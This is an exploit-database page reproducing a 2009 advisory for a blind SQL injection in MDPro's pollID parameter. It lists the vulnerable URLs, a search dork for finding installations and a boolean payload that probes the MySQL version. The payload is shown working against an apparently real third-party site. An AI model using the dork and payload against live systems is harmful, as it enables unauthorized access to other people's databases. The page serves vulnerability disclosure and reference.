header-logo
Suggest Exploit
vendor:
MDPro
by:
XaDoS
7,5
CVSS
HIGH
Blind $QL Injection (pollID)
89
CWE
Product Name: MDPro
Affected Version From: MDPro v 1.083.x
Affected Version To: MDPro v 1.083.x
Patch Exists: NO
Related CWE: N/A
CPE: a:maxdev:mdpro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Information_schema

The vulnerability exists in the pollID parameter of the modules.php file. An attacker can inject arbitrary SQL queries in the pollID parameter and execute them in the backend database. For example, an attacker can inject a substring query to extract the version of the backend database.

Mitigation:

Input validation should be done on the pollID parameter to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[!]Information_schema:

[Product:  MDPro v 1.083.x               ]
[site:     www.maxdev.com                ]
[Vuln:     Blind $QL Injection (pollID)  ]
[Author:   XaDoS ~ thanks to S3rg3770    ]
[dork:     inurl:modules.php?op= "pollID"]
[          "Powered By MDPro"            ]

[~] Vuln:  (PollID)

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
or
http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]

[~] DeMo:

For example, if yuo want see the version of MySql write:

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#

Like:

http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
so v => 5.0.0    (this site have 96 databases) :)

[~] Note:

If yuo want exploit for this vuln write it by yuorself. I'm really Busy.

thanks to s3rg3770 and warwolfz Crew


\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire

Have Fun :D

# milw0rm.com [2009-06-25]